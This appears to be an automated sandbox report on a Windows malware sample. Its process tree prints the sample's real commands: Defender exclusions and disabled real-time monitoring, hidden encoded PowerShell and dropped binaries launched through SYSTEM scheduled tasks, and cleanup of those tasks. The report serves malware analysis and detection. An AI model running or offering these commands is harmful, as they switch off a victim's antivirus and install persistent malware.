C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:924 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1616
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1800
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:364 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:916 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1084
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:792
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gjmorGDbh" /SC once /ST 16:39:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:836
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gjmorGDbh"4⤵PID:1960
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gjmorGDbh"4⤵PID:1360
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bfCUCTabMcDSMjMyBb" /SC once /ST 19:27:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\rUhpVuUWJmMrHzQUt\mUIFUANkJiIEysP\iHEqKTz.exe\" US /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:604
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {B254BCF0-E6DC-4C1A-95DD-043000C0F1C4} S-1-5-21-3385717845-2518323428-350143044-1000:SABDUHNY\Admin:Interactive:[1]1⤵PID:1100
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1744 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1344
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:296 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1140
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:792 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:108
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1744 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:900
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1600
-
C:\Windows\system32\taskeng.exetaskeng.exe {4CDED8D6-1E81-4AE4-ACFF-EE9D4C959BA7} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:960
-
C:\Users\Admin\AppData\Local\Temp\rUhpVuUWJmMrHzQUt\mUIFUANkJiIEysP\iHEqKTz.exeC:\Users\Admin\AppData\Local\Temp\rUhpVuUWJmMrHzQUt\mUIFUANkJiIEysP\iHEqKTz.exe US /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:788 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "glTwhkNmR" /SC once /ST 13:04:24 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1620
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "glTwhkNmR"3⤵PID:1536
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "glTwhkNmR"3⤵PID:1600
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1112
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1996
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1340
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1476
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gFnCUtXPa" /SC once /ST 09:26:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1360
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gFnCUtXPa"3⤵PID:1584
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gFnCUtXPa"3⤵PID:308
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yexCCFOajIHORAIN" /t REG_DWORD /d 0 /reg:323⤵PID:1324
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yexCCFOajIHORAIN" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1768
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yexCCFOajIHORAIN" /t REG_DWORD /d 0 /reg:643⤵PID:1736
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yexCCFOajIHORAIN" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1788
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yexCCFOajIHORAIN" /t REG_DWORD /d 0 /reg:323⤵PID:1392
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yexCCFOajIHORAIN" /t REG_DWORD /d 0 /reg:324⤵PID:1488
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yexCCFOajIHORAIN" /t REG_DWORD /d 0 /reg:643⤵PID:1336
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yexCCFOajIHORAIN" /t REG_DWORD /d 0 /reg:644⤵PID:1664
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\yexCCFOajIHORAIN\hpFRfLVe\lbDPnMqqgCewtcTe.wsf"3⤵PID:560
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\yexCCFOajIHORAIN\hpFRfLVe\lbDPnMqqgCewtcTe.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1500 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NwZfPRikU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NwZfPRikU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1268
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\abxmdGYmZpUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\abxmdGYmZpUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1472
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\blpPjnGTAzdU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\blpPjnGTAzdU2" /t REG_DWORD /d 0 /reg:644⤵PID:1220
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ljuzyWclZneVnEImCIR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ljuzyWclZneVnEImCIR" /t REG_DWORD /d 0 /reg:644⤵PID:1408
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xWQZBYHAiaeWC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:308
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xWQZBYHAiaeWC" /t REG_DWORD /d 0 /reg:644⤵PID:1140
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fUKjeSfjjlnEgcVB" /t REG_DWORD /d 0 /reg:324⤵PID:2032
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fUKjeSfjjlnEgcVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\rUhpVuUWJmMrHzQUt" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\rUhpVuUWJmMrHzQUt" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:852
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yexCCFOajIHORAIN" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yexCCFOajIHORAIN" /t REG_DWORD /d 0 /reg:644⤵PID:1688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NwZfPRikU" /t REG_DWORD /d 0 /reg:324⤵PID:1532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NwZfPRikU" /t REG_DWORD /d 0 /reg:644⤵PID:816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\abxmdGYmZpUn" /t REG_DWORD /d 0 /reg:324⤵PID:480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\abxmdGYmZpUn" /t REG_DWORD /d 0 /reg:644⤵PID:1772
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\blpPjnGTAzdU2" /t REG_DWORD /d 0 /reg:324⤵PID:1104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\blpPjnGTAzdU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1408
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ljuzyWclZneVnEImCIR" /t REG_DWORD /d 0 /reg:324⤵PID:568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ljuzyWclZneVnEImCIR" /t REG_DWORD /d 0 /reg:644⤵PID:840
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xWQZBYHAiaeWC" /t REG_DWORD /d 0 /reg:324⤵PID:1112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xWQZBYHAiaeWC" /t REG_DWORD /d 0 /reg:644⤵PID:1488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fUKjeSfjjlnEgcVB" /t REG_DWORD /d 0 /reg:324⤵PID:1048
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fUKjeSfjjlnEgcVB" /t REG_DWORD /d 0 /reg:644⤵PID:632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\rUhpVuUWJmMrHzQUt" /t REG_DWORD /d 0 /reg:324⤵PID:2020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\rUhpVuUWJmMrHzQUt" /t REG_DWORD /d 0 /reg:644⤵PID:1940
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yexCCFOajIHORAIN" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yexCCFOajIHORAIN" /t REG_DWORD /d 0 /reg:644⤵PID:1148
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gtfWjpvFu" /SC once /ST 10:26:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:836
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gtfWjpvFu"3⤵PID:1988
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gtfWjpvFu"3⤵PID:560
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:2032
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1048
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:240
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1056
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kyVYsaRdXUGdbNqrr" /SC once /ST 01:47:44 /RU "SYSTEM" /TR "\"C:\Windows\Temp\yexCCFOajIHORAIN\KwaaWofdDialaMP\dnHVamm.exe\" PW /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:916
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "kyVYsaRdXUGdbNqrr"3⤵PID:1484
-
-
-
C:\Windows\Temp\yexCCFOajIHORAIN\KwaaWofdDialaMP\dnHVamm.exeC:\Windows\Temp\yexCCFOajIHORAIN\KwaaWofdDialaMP\dnHVamm.exe PW /site_id 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1940 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bfCUCTabMcDSMjMyBb"3⤵PID:816
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1996
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:836
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:944
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:1964
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\NwZfPRikU\tpVwAz.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "OmzuWttHXavsTQP" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1580
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OmzuWttHXavsTQP2" /F /xml "C:\Program Files (x86)\NwZfPRikU\CbPYgpw.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1772
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "OmzuWttHXavsTQP"3⤵PID:840
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "OmzuWttHXavsTQP"3⤵PID:668
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rcHtPzqYNwvTMp" /F /xml "C:\Program Files (x86)\blpPjnGTAzdU2\YFzkXtR.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1160
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "wuzXXjbOVIiVs2" /F /xml "C:\ProgramData\fUKjeSfjjlnEgcVB\VJmEPAF.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1476
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EKXFYPeDcoLkpSRch2" /F /xml "C:\Program Files (x86)\ljuzyWclZneVnEImCIR\SWTEHUI.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1536
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WjfPjfhCFlMCdOOFtjN2" /F /xml "C:\Program Files (x86)\xWQZBYHAiaeWC\zUFWXMd.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1800
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "AdvNsdlCKgqWpwUCJ" /SC once /ST 18:02:51 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\yexCCFOajIHORAIN\qPGBoIsD\WgTIzRp.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1304
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "AdvNsdlCKgqWpwUCJ"3⤵PID:1484
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1292
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:1988
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1164
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:1308
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "kyVYsaRdXUGdbNqrr"3⤵PID:2012
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\yexCCFOajIHORAIN\qPGBoIsD\WgTIzRp.dll",#1 /site_id 5254032⤵PID:792
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\yexCCFOajIHORAIN\qPGBoIsD\WgTIzRp.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1688 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "AdvNsdlCKgqWpwUCJ"4⤵PID:900
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1740
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1292
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1387794066294428711-15425489461237476912-145419958312217393991203708087-1707190010"1⤵
- Windows security bypass
PID:1140
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1492907180-1723449941-1116757844185639122-24985043613870620051682004970-2043948359"1⤵
- Windows security bypass
PID:2032
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1344
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD519ea0361174925c781006a1ea8203d69
SHA1d6681b13ed57edb3a50728a59ce03844b844ade7
SHA25685689aa84294ecb48b7af27f1aea1790d97ea9d4530c7e9c072b91062766cfe0
SHA5120d582aa80ff86bb95e0f8849eae0689a91d617e79c4fb0f2267fe7d18097540dc1a859c5a4f9f8ea9044197a69f4c408f0ec4e9c93caa4e149cd09abfd0dc1e0
-
Filesize
2KB
MD512b390693f13e787f79c4bf9bf53612e
SHA1fd930d2a3de690266386c973243798be8d3c16ba
SHA25691120571773686737f56f3508d1e4beacafce9fe8a0c818a839785a16eac6d26
